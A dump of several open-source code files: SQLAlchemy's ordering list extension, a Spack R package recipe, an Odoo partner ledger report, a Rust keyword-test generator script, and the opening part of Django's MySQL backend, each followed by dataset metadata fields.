from ..orm.collections import collection
from ..orm.collections import collection_adapter
__all__ = ["ordering_list"]
def ordering_list(attr, count_from=None, **kw):
"""Prepares an :class:`OrderingList` factory for use in mapper definitions.
Returns an object suitable for use as an argument to a Mapper
relationship's ``collection_class`` option. e.g.::
from sqlalchemy.ext.orderinglist import ordering_list
class Slide(Base):
__tablename__ = 'slide'
id = Column(Integer, primary_key=True)
name = Column(String)
bullets = relationship("Bullet", order_by="Bullet.position",
collection_class=ordering_list('position'))
:param attr:
Name of the mapped attribute to use for storage and retrieval of
ordering information
:param count_from:
Set up an integer-based ordering, starting at ``count_from``. For
example, ``ordering_list('pos', count_from=1)`` would create a 1-based
list in SQL, storing the value in the 'pos' column. Ignored if
``ordering_func`` is supplied.
Additional arguments are passed to the :class:`.OrderingList` constructor.
"""
kw = _unsugar_count_from(count_from=count_from, **kw)
return lambda: OrderingList(attr, **kw)
# Ordering utility functions
def count_from_0(index, collection):
"""Numbering function: consecutive integers starting at 0."""
return index
def count_from_1(index, collection):
"""Numbering function: consecutive integers starting at 1."""
return index + 1
def count_from_n_factory(start):
"""Numbering function: consecutive integers starting at arbitrary start."""
def f(index, collection):
return index + start
try:
f.__name__ = "count_from_%i" % start
except TypeError:
pass
return f
def _unsugar_count_from(**kw):
"""Builds counting functions from keyword arguments.
Keyword argument filter, prepares a simple ``ordering_func`` from a
``count_from`` argument, otherwise passes ``ordering_func`` on unchanged.
"""
count_from = kw.pop("count_from", None)
if kw.get("ordering_func", None) is None and count_from is not None:
if count_from == 0:
kw["ordering_func"] = count_from_0
elif count_from == 1:
kw["ordering_func"] = count_from_1
else:
kw["ordering_func"] = count_from_n_factory(count_from)
return kw
class OrderingList(list):
"""A custom list that manages position information for its children.
The :class:`.OrderingList` object is normally set up using the
:func:`.ordering_list` factory function, used in conjunction with
the :func:`_orm.relationship` function.
"""
def __init__(
self, ordering_attr=None, ordering_func=None, reorder_on_append=False
):
"""A custom list that manages position information for its children.
``OrderingList`` is a ``collection_class`` list implementation that
syncs position in a Python list with a position attribute on the
mapped objects.
This implementation relies on the list starting in the proper order,
so be **sure** to put an ``order_by`` on your relationship.
:param ordering_attr:
Name of the attribute that stores the object's order in the
relationship.
:param ordering_func: Optional. A function that maps the position in
the Python list to a value to store in the
``ordering_attr``. Values returned are usually (but need not be!)
integers.
An ``ordering_func`` is called with two positional parameters: the
index of the element in the list, and the list itself.
If omitted, Python list indexes are used for the attribute values.
Two basic pre-built numbering functions are provided in this module:
``count_from_0`` and ``count_from_1``. For more exotic examples
like stepped numbering, alphabetical and Fibonacci numbering, see
the unit tests.
:param reorder_on_append:
Default False. When appending an object with an existing (non-None)
ordering value, that value will be left untouched unless
``reorder_on_append`` is true. This is an optimization to avoid a
variety of dangerous unexpected database writes.
SQLAlchemy will add instances to the list via append() when your
object loads. If for some reason the result set from the database
skips a step in the ordering (say, row '1' is missing but you get
'2', '3', and '4'), reorder_on_append=True would immediately
renumber the items to '1', '2', '3'. If you have multiple sessions
making changes, any of whom happen to load this collection even in
passing, all of the sessions would try to "clean up" the numbering
in their commits, possibly causing all but one to fail with a
concurrent modification error.
Recommend leaving this with the default of False, and just call
``reorder()`` if you're doing ``append()`` operations with
previously ordered instances or when doing some housekeeping after
manual sql operations.
"""
self.ordering_attr = ordering_attr
if ordering_func is None:
ordering_func = count_from_0
self.ordering_func = ordering_func
self.reorder_on_append = reorder_on_append
# More complex serialization schemes (multi column, e.g.) are possible by
# subclassing and reimplementing these two methods.
def _get_order_value(self, entity):
return getattr(entity, self.ordering_attr)
def _set_order_value(self, entity, value):
setattr(entity, self.ordering_attr, value)
def reorder(self):
"""Synchronize ordering for the entire collection.
Sweeps through the list and ensures that each object has accurate
ordering information set.
"""
for index, entity in enumerate(self):
self._order_entity(index, entity, True)
# As of 0.5, _reorder is no longer semi-private
_reorder = reorder
def _order_entity(self, index, entity, reorder=True):
have = self._get_order_value(entity)
# Don't disturb existing ordering if reorder is False
if have is not None and not reorder:
return
should_be = self.ordering_func(index, self)
if have != should_be:
self._set_order_value(entity, should_be)
def append(self, entity):
super(OrderingList, self).append(entity)
self._order_entity(len(self) - 1, entity, self.reorder_on_append)
def _raw_append(self, entity):
"""Append without any ordering behavior."""
super(OrderingList, self).append(entity)
_raw_append = collection.adds(1)(_raw_append)
def insert(self, index, entity):
super(OrderingList, self).insert(index, entity)
self._reorder()
def remove(self, entity):
super(OrderingList, self).remove(entity)
adapter = collection_adapter(self)
if adapter and adapter._referenced_by_owner:
self._reorder()
def pop(self, index=-1):
entity = super(OrderingList, self).pop(index)
self._reorder()
return entity
def __setitem__(self, index, entity):
if isinstance(index, slice):
step = index.step or 1
start = index.start or 0
if start < 0:
start += len(self)
stop = index.stop or len(self)
if stop < 0:
stop += len(self)
for i in range(start, stop, step):
self.__setitem__(i, entity[i])
else:
self._order_entity(index, entity, True)
super(OrderingList, self).__setitem__(index, entity)
def __delitem__(self, index):
super(OrderingList, self).__delitem__(index)
self._reorder()
def __setslice__(self, start, end, values):
super(OrderingList, self).__setslice__(start, end, values)
self._reorder()
def __delslice__(self, start, end):
super(OrderingList, self).__delslice__(start, end)
self._reorder()
def __reduce__(self):
return _reconstitute, (self.__class__, self.__dict__, list(self))
for func_name, func in list(locals().items()):
if (
callable(func)
and func.__name__ == func_name
and not func.__doc__
and hasattr(list, func_name)
):
func.__doc__ = getattr(list, func_name).__doc__
del func_name, func
def _reconstitute(cls, dict_, items):
"""Reconstitute an :class:`.OrderingList`.
This is the adjoint to :meth:`.OrderingList.__reduce__`. It is used for
unpickling :class:`.OrderingList` objects.
"""
obj = cls.__new__(cls)
obj.__dict__.update(dict_)
list.extend(obj, items)
return obj
| mit | 6,990,032,291,811,268,000 | 34.760309 | 79 | 0.654919 | false |
mfherbst/spack | var/spack/repos/builtin/packages/r-plotly/package.py | 5 | 2533 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RPlotly(RPackage):
"""Easily translate 'ggplot2' graphs to an interactive web-based version
and/or create custom web-based visualizations directly from R."""
homepage = "https://cran.r-project.org/web/packages/plotly/index.html"
url = "https://cran.r-project.org/src/contrib/plotly_4.7.1.tar.gz"
list_url = "https://cran.rstudio.com/src/contrib/Archive/plotly"
version('4.7.1', '4799c8b429291d4c52fb904380806548')
version('4.7.0', '5bd52d515c01af7ff291c30a6cf23bec')
version('4.6.0', '27ff3de288bacfaad6e6694752ea2929')
version('4.5.6', 'e6e00177fa64dc6b1a199facfd73f585')
version('4.5.2', '7eb11b24a9faa9a572657fd89ed72fa5')
depends_on('r@3.4.0:3.4.9')
depends_on('r-ggplot2', type=('build', 'run'))
depends_on('r-httr', type=('build', 'run'))
depends_on('r-base64enc', type=('build', 'run'))
depends_on('r-htmltools', type=('build', 'run'))
depends_on('r-tidyr', type=('build', 'run'))
depends_on('r-dplyr', type=('build', 'run'))
depends_on('r-htmlwidgets', type=('build', 'run'))
depends_on('r-data-table', type=('build', 'run'))
depends_on('r-hexbin', type=('build', 'run'))
depends_on('r-purrr', type=('build', 'run'))
depends_on('r-crosstalk', type=('build', 'run'))
| lgpl-2.1 | 3,101,067,797,805,543,000 | 46.792453 | 78 | 0.660087 | false |
dllsf/odootest | addons/account/report/account_partner_ledger.py | 81 | 13063 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import osv
from openerp.tools.translate import _
from openerp.report import report_sxw
from common_report_header import common_report_header
class third_party_ledger(report_sxw.rml_parse, common_report_header):
def __init__(self, cr, uid, name, context=None):
super(third_party_ledger, self).__init__(cr, uid, name, context=context)
self.init_bal_sum = 0.0
self.localcontext.update({
'time': time,
'lines': self.lines,
'sum_debit_partner': self._sum_debit_partner,
'sum_credit_partner': self._sum_credit_partner,
'get_currency': self._get_currency,
'get_start_period': self.get_start_period,
'get_end_period': self.get_end_period,
'get_account': self._get_account,
'get_filter': self._get_filter,
'get_start_date': self._get_start_date,
'get_end_date': self._get_end_date,
'get_fiscalyear': self._get_fiscalyear,
'get_journal': self._get_journal,
'get_partners':self._get_partners,
'get_intial_balance':self._get_intial_balance,
'display_initial_balance':self._display_initial_balance,
'display_currency':self._display_currency,
'get_target_move': self._get_target_move,
})
def _get_filter(self, data):
if data['form']['filter'] == 'unreconciled':
return _('Unreconciled Entries')
return super(third_party_ledger, self)._get_filter(data)
def set_context(self, objects, data, ids, report_type=None):
obj_move = self.pool.get('account.move.line')
obj_partner = self.pool.get('res.partner')
self.query = obj_move._query_get(self.cr, self.uid, obj='l', context=data['form'].get('used_context', {}))
ctx2 = data['form'].get('used_context',{}).copy()
self.initial_balance = data['form'].get('initial_balance', True)
if self.initial_balance:
ctx2.update({'initial_bal': True})
self.init_query = obj_move._query_get(self.cr, self.uid, obj='l', context=ctx2)
self.reconcil = True
if data['form']['filter'] == 'unreconciled':
self.reconcil = False
self.result_selection = data['form'].get('result_selection', 'customer')
self.amount_currency = data['form'].get('amount_currency', False)
self.target_move = data['form'].get('target_move', 'all')
PARTNER_REQUEST = ''
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
if self.result_selection == 'supplier':
self.ACCOUNT_TYPE = ['payable']
elif self.result_selection == 'customer':
self.ACCOUNT_TYPE = ['receivable']
else:
self.ACCOUNT_TYPE = ['payable','receivable']
self.cr.execute(
"SELECT a.id " \
"FROM account_account a " \
"LEFT JOIN account_account_type t " \
"ON (a.type=t.code) " \
'WHERE a.type IN %s' \
"AND a.active", (tuple(self.ACCOUNT_TYPE), ))
self.account_ids = [a for (a,) in self.cr.fetchall()]
params = [tuple(move_state), tuple(self.account_ids)]
#if we print from the partners, add a clause on active_ids
if (data['model'] == 'res.partner') and ids:
PARTNER_REQUEST = "AND l.partner_id IN %s"
params += [tuple(ids)]
self.cr.execute(
"SELECT DISTINCT l.partner_id " \
"FROM account_move_line AS l, account_account AS account, " \
" account_move AS am " \
"WHERE l.partner_id IS NOT NULL " \
"AND l.account_id = account.id " \
"AND am.id = l.move_id " \
"AND am.state IN %s"
# "AND " + self.query +" " \
"AND l.account_id IN %s " \
" " + PARTNER_REQUEST + " " \
"AND account.active ", params)
self.partner_ids = [res['partner_id'] for res in self.cr.dictfetchall()]
objects = obj_partner.browse(self.cr, self.uid, self.partner_ids)
return super(third_party_ledger, self).set_context(objects, data, self.partner_ids, report_type)
def lines(self, partner):
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
full_account = []
if self.reconcil:
RECONCILE_TAG = " "
else:
RECONCILE_TAG = "AND l.reconcile_id IS NULL"
self.cr.execute(
"SELECT l.id, l.date, j.code, acc.code as a_code, acc.name as a_name, l.ref, m.name as move_name, l.name, l.debit, l.credit, l.amount_currency,l.currency_id, c.symbol AS currency_code " \
"FROM account_move_line l " \
"LEFT JOIN account_journal j " \
"ON (l.journal_id = j.id) " \
"LEFT JOIN account_account acc " \
"ON (l.account_id = acc.id) " \
"LEFT JOIN res_currency c ON (l.currency_id=c.id)" \
"LEFT JOIN account_move m ON (m.id=l.move_id)" \
"WHERE l.partner_id = %s " \
"AND l.account_id IN %s AND " + self.query +" " \
"AND m.state IN %s " \
" " + RECONCILE_TAG + " "\
"ORDER BY l.date",
(partner.id, tuple(self.account_ids), tuple(move_state)))
res = self.cr.dictfetchall()
sum = 0.0
if self.initial_balance:
sum = self.init_bal_sum
for r in res:
sum += r['debit'] - r['credit']
r['progress'] = sum
full_account.append(r)
return full_account
def _get_intial_balance(self, partner):
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
if self.reconcil:
RECONCILE_TAG = " "
else:
RECONCILE_TAG = "AND l.reconcile_id IS NULL"
self.cr.execute(
"SELECT COALESCE(SUM(l.debit),0.0), COALESCE(SUM(l.credit),0.0), COALESCE(sum(debit-credit), 0.0) " \
"FROM account_move_line AS l, " \
"account_move AS m "
"WHERE l.partner_id = %s " \
"AND m.id = l.move_id " \
"AND m.state IN %s "
"AND account_id IN %s" \
" " + RECONCILE_TAG + " "\
"AND " + self.init_query + " ",
(partner.id, tuple(move_state), tuple(self.account_ids)))
res = self.cr.fetchall()
self.init_bal_sum = res[0][2]
return res
def _sum_debit_partner(self, partner):
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
result_tmp = 0.0
result_init = 0.0
if self.reconcil:
RECONCILE_TAG = " "
else:
RECONCILE_TAG = "AND reconcile_id IS NULL"
if self.initial_balance:
self.cr.execute(
"SELECT sum(debit) " \
"FROM account_move_line AS l, " \
"account_move AS m "
"WHERE l.partner_id = %s" \
"AND m.id = l.move_id " \
"AND m.state IN %s "
"AND account_id IN %s" \
" " + RECONCILE_TAG + " " \
"AND " + self.init_query + " ",
(partner.id, tuple(move_state), tuple(self.account_ids)))
contemp = self.cr.fetchone()
if contemp != None:
result_init = contemp[0] or 0.0
else:
result_init = result_tmp + 0.0
self.cr.execute(
"SELECT sum(debit) " \
"FROM account_move_line AS l, " \
"account_move AS m "
"WHERE l.partner_id = %s " \
"AND m.id = l.move_id " \
"AND m.state IN %s "
"AND account_id IN %s" \
" " + RECONCILE_TAG + " " \
"AND " + self.query + " ",
(partner.id, tuple(move_state), tuple(self.account_ids),))
contemp = self.cr.fetchone()
if contemp != None:
result_tmp = contemp[0] or 0.0
else:
result_tmp = result_tmp + 0.0
return result_tmp + result_init
def _sum_credit_partner(self, partner):
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
result_tmp = 0.0
result_init = 0.0
if self.reconcil:
RECONCILE_TAG = " "
else:
RECONCILE_TAG = "AND reconcile_id IS NULL"
if self.initial_balance:
self.cr.execute(
"SELECT sum(credit) " \
"FROM account_move_line AS l, " \
"account_move AS m "
"WHERE l.partner_id = %s" \
"AND m.id = l.move_id " \
"AND m.state IN %s "
"AND account_id IN %s" \
" " + RECONCILE_TAG + " " \
"AND " + self.init_query + " ",
(partner.id, tuple(move_state), tuple(self.account_ids)))
contemp = self.cr.fetchone()
if contemp != None:
result_init = contemp[0] or 0.0
else:
result_init = result_tmp + 0.0
self.cr.execute(
"SELECT sum(credit) " \
"FROM account_move_line AS l, " \
"account_move AS m "
"WHERE l.partner_id=%s " \
"AND m.id = l.move_id " \
"AND m.state IN %s "
"AND account_id IN %s" \
" " + RECONCILE_TAG + " " \
"AND " + self.query + " ",
(partner.id, tuple(move_state), tuple(self.account_ids),))
contemp = self.cr.fetchone()
if contemp != None:
result_tmp = contemp[0] or 0.0
else:
result_tmp = result_tmp + 0.0
return result_tmp + result_init
def _get_partners(self):
# TODO: deprecated, to remove in trunk
if self.result_selection == 'customer':
return _('Receivable Accounts')
elif self.result_selection == 'supplier':
return _('Payable Accounts')
elif self.result_selection == 'customer_supplier':
return _('Receivable and Payable Accounts')
return ''
def _sum_currency_amount_account(self, account, form):
self._set_get_account_currency_code(account.id)
self.cr.execute("SELECT sum(aml.amount_currency) FROM account_move_line as aml,res_currency as rc WHERE aml.currency_id = rc.id AND aml.account_id= %s ", (account.id,))
total = self.cr.fetchone()
if self.account_currency:
return_field = str(total[0]) + self.account_currency
return return_field
else:
currency_total = self.tot_currency = 0.0
return currency_total
def _display_initial_balance(self, data):
if self.initial_balance:
return True
return False
def _display_currency(self, data):
if self.amount_currency:
return True
return False
class report_partnerledger(osv.AbstractModel):
_name = 'report.account.report_partnerledger'
_inherit = 'report.abstract_report'
_template = 'account.report_partnerledger'
_wrapped_report_class = third_party_ledger
class report_partnerledgerother(osv.AbstractModel):
_name = 'report.account.report_partnerledgerother'
_inherit = 'report.abstract_report'
_template = 'account.report_partnerledgerother'
_wrapped_report_class = third_party_ledger
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 2,841,644,555,824,371,700 | 40.469841 | 199 | 0.521703 | false |
avdi/rust | src/etc/generate-keyword-tests.py | 53 | 1985 | #!/usr/bin/env python
#
# Copyright 2013 The Rust Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution and at
# http://rust-lang.org/COPYRIGHT.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
"""
This script takes a list of keywords and generates a testcase, that checks
if using the keyword as identifier fails, for every keyword. The generate
test files are set read-only.
Test for https://github.com/rust-lang/rust/issues/2275
sample usage: src/etc/generate-keyword-tests.py as break
"""
import sys
import os
import datetime
import stat
template = """// Copyright %d The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// This file was auto-generated using 'src/etc/generate-keyword-tests.py %s'
fn main() {
let %s = "foo"; //~ error: ident
}
"""
test_dir = os.path.abspath(
os.path.join(os.path.dirname(__file__), '../test/compile-fail')
)
for kw in sys.argv[1:]:
test_file = os.path.join(test_dir, 'keyword-%s-as-identifier.rs' % kw)
# set write permission if file exists, so it can be changed
if os.path.exists(test_file):
os.chmod(test_file, stat.S_IWUSR)
with open(test_file, 'wt') as f:
f.write(template % (datetime.datetime.now().year, kw, kw))
# mark file read-only
os.chmod(test_file, stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
| apache-2.0 | 5,708,426,297,778,499,000 | 32.644068 | 76 | 0.711839 | false |
hungtt57/matchmaker | lib/python2.7/site-packages/django/db/backends/mysql/base.py | 103 | 15969 | """
MySQL database backend for Django.
Requires mysqlclient: https://pypi.python.org/pypi/mysqlclient/
MySQLdb is supported for Python 2 only: http://sourceforge.net/projects/mysql-python
"""
from __future__ import unicode_literals
import datetime
import re
import sys
import warnings
from django.conf import settings
from django.db import utils
from django.db.backends import utils as backend_utils
from django.db.backends.base.base import BaseDatabaseWrapper
from django.utils import six, timezone
from django.utils.encoding import force_str
from django.utils.functional import cached_property
from django.utils.safestring import SafeBytes, SafeText
try:
import MySQLdb as Database
except ImportError as e:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("Error loading MySQLdb module: %s" % e)
from MySQLdb.constants import CLIENT, FIELD_TYPE # isort:skip
from MySQLdb.converters import Thing2Literal, conversions # isort:skip
# Some of these import MySQLdb, so import them after checking if it's installed.
from .client import DatabaseClient # isort:skip
from .creation import DatabaseCreation # isort:skip
from .features import DatabaseFeatures # isort:skip
from .introspection import DatabaseIntrospection # isort:skip
from .operations import DatabaseOperations # isort:skip
from .schema import DatabaseSchemaEditor # isort:skip
from .validation import DatabaseValidation # isort:skip
# We want version (1, 2, 1, 'final', 2) or later. We can't just use
# lexicographic ordering in this check because then (1, 2, 1, 'gamma')
# inadvertently passes the version test.
version = Database.version_info
if (version < (1, 2, 1) or (version[:3] == (1, 2, 1) and
(len(version) < 5 or version[3] != 'final' or version[4] < 2))):
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("MySQLdb-1.2.1p2 or newer is required; you have %s" % Database.__version__)
DatabaseError = Database.DatabaseError
IntegrityError = Database.IntegrityError
# It's impossible to import datetime_or_None directly from MySQLdb.times
parse_datetime = conversions[FIELD_TYPE.DATETIME]
def parse_datetime_with_timezone_support(value):
dt = parse_datetime(value)
# Confirm that dt is naive before overwriting its tzinfo.
if dt is not None and settings.USE_TZ and timezone.is_naive(dt):
dt = dt.replace(tzinfo=timezone.utc)
return dt
def adapt_datetime_with_timezone_support(value, conv):
# Equivalent to DateTimeField.get_db_prep_value. Used only by raw SQL.
if settings.USE_TZ:
if timezone.is_naive(value):
warnings.warn("MySQL received a naive datetime (%s)"
" while time zone support is active." % value,
RuntimeWarning)
default_timezone = timezone.get_default_timezone()
value = timezone.make_aware(value, default_timezone)
value = value.astimezone(timezone.utc).replace(tzinfo=None)
return Thing2Literal(value.strftime("%Y-%m-%d %H:%M:%S.%f"), conv)
# MySQLdb-1.2.1 returns TIME columns as timedelta -- they are more like
# timedelta in terms of actual behavior as they are signed and include days --
# and Django expects time, so we still need to override that. We also need to
# add special handling for SafeText and SafeBytes as MySQLdb's type
# checking is too tight to catch those (see Django ticket #6052).
# Finally, MySQLdb always returns naive datetime objects. However, when
# timezone support is active, Django expects timezone-aware datetime objects.
django_conversions = conversions.copy()
django_conversions.update({
FIELD_TYPE.TIME: backend_utils.typecast_time,
FIELD_TYPE.DECIMAL: backend_utils.typecast_decimal,
FIELD_TYPE.NEWDECIMAL: backend_utils.typecast_decimal,
FIELD_TYPE.DATETIME: parse_datetime_with_timezone_support,
datetime.datetime: adapt_datetime_with_timezone_support,
})
# This should match the numerical portion of the version numbers (we can treat
# versions like 5.0.24 and 5.0.24a as the same). Based on the list of version
# at http://dev.mysql.com/doc/refman/4.1/en/news.html and
# http://dev.mysql.com/doc/refman/5.0/en/news.html .
server_version_re = re.compile(r'(\d{1,2})\.(\d{1,2})\.(\d{1,2})')
# MySQLdb-1.2.1 and newer automatically makes use of SHOW WARNINGS on
# MySQL-4.1 and newer, so the MysqlDebugWrapper is unnecessary. Since the
# point is to raise Warnings as exceptions, this can be done with the Python
# warning module, and this is setup when the connection is created, and the
# standard backend_utils.CursorDebugWrapper can be used. Also, using sql_mode
# TRADITIONAL will automatically cause most warnings to be treated as errors.
class CursorWrapper(object):
"""
A thin wrapper around MySQLdb's normal cursor class so that we can catch
particular exception instances and reraise them with the right types.
Implemented as a wrapper, rather than a subclass, so that we aren't stuck
to the particular underlying representation returned by Connection.cursor().
"""
codes_for_integrityerror = (1048,)
def __init__(self, cursor):
self.cursor = cursor
def execute(self, query, args=None):
try:
# args is None means no string interpolation
return self.cursor.execute(query, args)
except Database.OperationalError as e:
# Map some error codes to IntegrityError, since they seem to be
# misclassified and Django would prefer the more logical place.
if e.args[0] in self.codes_for_integrityerror:
six.reraise(utils.IntegrityError, utils.IntegrityError(*tuple(e.args)), sys.exc_info()[2])
raise
def executemany(self, query, args):
try:
return self.cursor.executemany(query, args)
except Database.OperationalError as e:
# Map some error codes to IntegrityError, since they seem to be
# misclassified and Django would prefer the more logical place.
if e.args[0] in self.codes_for_integrityerror:
six.reraise(utils.IntegrityError, utils.IntegrityError(*tuple(e.args)), sys.exc_info()[2])
raise
def __getattr__(self, attr):
if attr in self.__dict__:
return self.__dict__[attr]
else:
return getattr(self.cursor, attr)
def __iter__(self):
return iter(self.cursor)
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
# Ticket #17671 - Close instead of passing thru to avoid backend
# specific behavior.
self.close()
class DatabaseWrapper(BaseDatabaseWrapper):
vendor = 'mysql'
# This dictionary maps Field objects to their associated MySQL column
# types, as strings. Column-type strings can contain format strings; they'll
# be interpolated against the values of Field.__dict__ before being output.
# If a column type is set to None, it won't be included in the output.
_data_types = {
'AutoField': 'integer AUTO_INCREMENT',
'BinaryField': 'longblob',
'BooleanField': 'bool',
'CharField': 'varchar(%(max_length)s)',
'CommaSeparatedIntegerField': 'varchar(%(max_length)s)',
'DateField': 'date',
'DateTimeField': 'datetime',
'DecimalField': 'numeric(%(max_digits)s, %(decimal_places)s)',
'DurationField': 'bigint',
'FileField': 'varchar(%(max_length)s)',
'FilePathField': 'varchar(%(max_length)s)',
'FloatField': 'double precision',
'IntegerField': 'integer',
'BigIntegerField': 'bigint',
'IPAddressField': 'char(15)',
'GenericIPAddressField': 'char(39)',
'NullBooleanField': 'bool',
'OneToOneField': 'integer',
'PositiveIntegerField': 'integer UNSIGNED',
'PositiveSmallIntegerField': 'smallint UNSIGNED',
'SlugField': 'varchar(%(max_length)s)',
'SmallIntegerField': 'smallint',
'TextField': 'longtext',
'TimeField': 'time',
'UUIDField': 'char(32)',
}
@cached_property
def data_types(self):
if self.features.supports_microsecond_precision:
return dict(self._data_types, DateTimeField='datetime(6)', TimeField='time(6)')
else:
return self._data_types
operators = {
'exact': '= %s',
'iexact': 'LIKE %s',
'contains': 'LIKE BINARY %s',
'icontains': 'LIKE %s',
'regex': 'REGEXP BINARY %s',
'iregex': 'REGEXP %s',
'gt': '> %s',
'gte': '>= %s',
'lt': '< %s',
'lte': '<= %s',
'startswith': 'LIKE BINARY %s',
'endswith': 'LIKE BINARY %s',
'istartswith': 'LIKE %s',
'iendswith': 'LIKE %s',
}
# The patterns below are used to generate SQL pattern lookup clauses when
# the right-hand side of the lookup isn't a raw string (it might be an expression
# or the result of a bilateral transformation).
# In those cases, special characters for LIKE operators (e.g. \, *, _) should be
# escaped on database side.
#
# Note: we use str.format() here for readability as '%' is used as a wildcard for
# the LIKE operator.
pattern_esc = r"REPLACE(REPLACE(REPLACE({}, '\\', '\\\\'), '%%', '\%%'), '_', '\_')"
pattern_ops = {
'contains': "LIKE BINARY CONCAT('%%', {}, '%%')",
'icontains': "LIKE CONCAT('%%', {}, '%%')",
'startswith': "LIKE BINARY CONCAT({}, '%%')",
'istartswith': "LIKE CONCAT({}, '%%')",
'endswith': "LIKE BINARY CONCAT('%%', {})",
'iendswith': "LIKE CONCAT('%%', {})",
}
Database = Database
SchemaEditorClass = DatabaseSchemaEditor
def __init__(self, *args, **kwargs):
super(DatabaseWrapper, self).__init__(*args, **kwargs)
self.features = DatabaseFeatures(self)
self.ops = DatabaseOperations(self)
self.client = DatabaseClient(self)
self.creation = DatabaseCreation(self)
self.introspection = DatabaseIntrospection(self)
self.validation = DatabaseValidation(self)
def get_connection_params(self):
kwargs = {
'conv': django_conversions,
'charset': 'utf8',
}
if six.PY2:
kwargs['use_unicode'] = True
settings_dict = self.settings_dict
if settings_dict['USER']:
kwargs['user'] = settings_dict['USER']
if settings_dict['NAME']:
kwargs['db'] = settings_dict['NAME']
if settings_dict['PASSWORD']:
kwargs['passwd'] = force_str(settings_dict['PASSWORD'])
if settings_dict['HOST'].startswith('/'):
kwargs['unix_socket'] = settings_dict['HOST']
elif settings_dict['HOST']:
kwargs['host'] = settings_dict['HOST']
if settings_dict['PORT']:
kwargs['port'] = int(settings_dict['PORT'])
# We need the number of potentially affected rows after an
# "UPDATE", not the number of changed rows.
kwargs['client_flag'] = CLIENT.FOUND_ROWS
kwargs.update(settings_dict['OPTIONS'])
return kwargs
def get_new_connection(self, conn_params):
conn = Database.connect(**conn_params)
conn.encoders[SafeText] = conn.encoders[six.text_type]
conn.encoders[SafeBytes] = conn.encoders[bytes]
return conn
def init_connection_state(self):
with self.cursor() as cursor:
# SQL_AUTO_IS_NULL in MySQL controls whether an AUTO_INCREMENT column
# on a recently-inserted row will return when the field is tested for
# NULL. Disabling this value brings this aspect of MySQL in line with
# SQL standards.
cursor.execute('SET SQL_AUTO_IS_NULL = 0')
def create_cursor(self):
cursor = self.connection.cursor()
return CursorWrapper(cursor)
def _rollback(self):
try:
BaseDatabaseWrapper._rollback(self)
except Database.NotSupportedError:
pass
def _set_autocommit(self, autocommit):
with self.wrap_database_errors:
self.connection.autocommit(autocommit)
def disable_constraint_checking(self):
"""
Disables foreign key checks, primarily for use in adding rows with forward references. Always returns True,
to indicate constraint checks need to be re-enabled.
"""
self.cursor().execute('SET foreign_key_checks=0')
return True
def enable_constraint_checking(self):
"""
Re-enable foreign key checks after they have been disabled.
"""
# Override needs_rollback in case constraint_checks_disabled is
# nested inside transaction.atomic.
self.needs_rollback, needs_rollback = False, self.needs_rollback
try:
self.cursor().execute('SET foreign_key_checks=1')
finally:
self.needs_rollback = needs_rollback
def check_constraints(self, table_names=None):
"""
Checks each table name in `table_names` for rows with invalid foreign
key references. This method is intended to be used in conjunction with
`disable_constraint_checking()` and `enable_constraint_checking()`, to
determine if rows with invalid references were entered while constraint
checks were off.
Raises an IntegrityError on the first invalid foreign key reference
encountered (if any) and provides detailed information about the
invalid reference in the error message.
Backends can override this method if they can more directly apply
constraint checking (e.g. via "SET CONSTRAINTS ALL IMMEDIATE")
"""
cursor = self.cursor()
if table_names is None:
table_names = self.introspection.table_names(cursor)
for table_name in table_names:
primary_key_column_name = self.introspection.get_primary_key_column(cursor, table_name)
if not primary_key_column_name:
continue
key_columns = self.introspection.get_key_columns(cursor, table_name)
for column_name, referenced_table_name, referenced_column_name in key_columns:
cursor.execute("""
SELECT REFERRING.`%s`, REFERRING.`%s` FROM `%s` as REFERRING
LEFT JOIN `%s` as REFERRED
